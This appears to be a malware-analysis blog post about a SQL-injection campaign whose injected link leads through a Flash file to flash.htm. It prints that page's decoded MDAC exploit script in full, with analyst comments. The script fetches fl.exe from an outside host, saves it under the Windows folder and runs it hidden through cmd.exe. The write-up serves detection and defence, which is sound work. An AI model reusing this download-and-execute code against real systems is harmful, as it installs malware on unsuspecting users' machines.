61.31.235.114

Foolishness or desperation? A SQL-injection attack whose injected script links to an IP address instead of a domain.

The injected script link is 61.31.235.114/i.swf

However i.swf currently does not exist on the machine. What exists is 1.swf.

1.swf contains iframe src=http://61.31.235.114/flash.htm

flash.htm contains 2 attack scripts.

The first exploits an Adobe Flash Player vulnerability (fl/ifl.html and fl/ffl.html).
The second exploits an MDAC vulnerability. The decoded script is as follows (its string literals are still hex-escaped):

<SCRIPT>
// Payload URL: the executable that the try-block below fetches, writes to disk and runs.
// Analyst note: treat the host and path as indicators when searching proxy/DNS logs.
DZ="http://jmrlmgg.cn/fl.exe";
// Filler: this variable is only ever assigned "" and never read anywhere in the script.
// NOTE(review): the repeated assignments look like padding to break up the statement
// sequence, presumably against signature matching; the page does not confirm this.
aolslslx="";
/**
 * Builds the file name under which the downloaded payload is saved.
 *
 * Decoded literals: "\x7E\x54\x65\x6D\x70" is "~Temp" and "\x2E\x74\x6D\x70" is ".tmp",
 * so the result has the form ~Temp<number>.tmp, e.g. "~Temp1234.tmp" (constructed example).
 * Analyst note: the naming pattern is usable as a host-side indicator.
 *
 * @param n upper bound for the random number (the only caller passes 9999)
 * @returns the generated file name, without a directory
 */
function GnMs(n)
{
// Math.random() is in [0,1), so after rounding the number lies between 0 and n inclusive.
var numberMs = Math.random()*n;
return "\x7E\x54\x65\x6D\x70"+Math.round(numberMs)+"\x2E\x74\x6D\x70";
}
// Download-and-execute stage of the MDAC attack described in the post.
// Sequence: create an <object> with a fixed classid, use its CreateObject() to obtain
// scripting COM objects, fetch the payload URL in DZ, save the response body to disk,
// then launch it through cmd.exe. Hex-escaped literals are decoded in the comments below
// so that the ProgIDs and the CLSID can be used for detection content.
try
{
aolslslx="";
// "\x6F\x62\x6A\x65\x63\x74" decodes to "object".
var Bf=document.createElement("\x6F\x62\x6A\x65\x63\x74");
// Decodes to classid = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" (the RDS.DataSpace control).
// Analyst note: this CLSID in page script is a strong indicator of the MDAC technique;
// the vendor patch or a kill bit for this CLSID is the usual mitigation (confirm for your estate).
Bf.setAttribute("\x63\x6C\x61\x73\x73\x69\x64","\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");
// ProgID "Microsoft.XMLHTTP", split across two literals and joined with "+".
var Kx=Bf.CreateObject("\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58"+"\x4D\x4C\x48\x54\x54\x50","");
// ProgID "Adodb.Stream", used below to write the downloaded bytes to a file.
var AS=Bf.CreateObject("\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D","");
aolslslx="";
// Stream type 1 is binary (adTypeBinary).
AS.type=1;
aolslslx="";
// "\x47\x45\x54" is "GET"; the third argument 0 (false) makes the request synchronous.
Kx.open("\x47\x45\x54", DZ,0);
aolslslx="";
Kx.send();
aolslslx="";
// File name of the form ~Temp<number>.tmp; Ns1 is assigned without var (implicit global).
Ns1=GnMs(9999);
aolslslx="";
// ProgID "Scripting.FileSystemObject".
var cF=Bf.CreateObject("\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","");
// GetSpecialFolder(0) is the Windows folder, so Ns1 becomes <Windows folder>\~Temp<number>.tmp;
// the HTTP response body is then written into the stream.
var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
// SaveToFile option 2 overwrites an existing file (adSaveCreateOverWrite).
// The second CreateObject on this line uses ProgID "Shell.Application".
AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","");
// Decodes to BuildPath(NsTmp + "\\system32", "cmd.exe"); the literal holds two backslash
// characters. ok1 is also an implicit global.
ok1=cF.BuildPath(NsTmp+"\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32","\x63\x6D\x64\x2E\x65\x78\x65");
// Decoded arguments: " /c " + Ns1, verb "open", window style 0 (hidden).
// Analyst note: a browser process spawning cmd.exe /c on a .tmp file under the Windows
// folder is a process-creation pattern worth alerting on.
q.SHeLLExecute(ok1,"\x20\x2F\x63 "+Ns1,"","\x6F\x70\x65\x6E",0);
aolslslx="";
}
// Any exception is discarded, so a failed attempt surfaces no script error to the visitor.
catch(MsI) { MsI=1; }
aolslslx="";
</SCRIPT>

VirusTotal analysis of http://jmrlmgg.cn/fl.exe
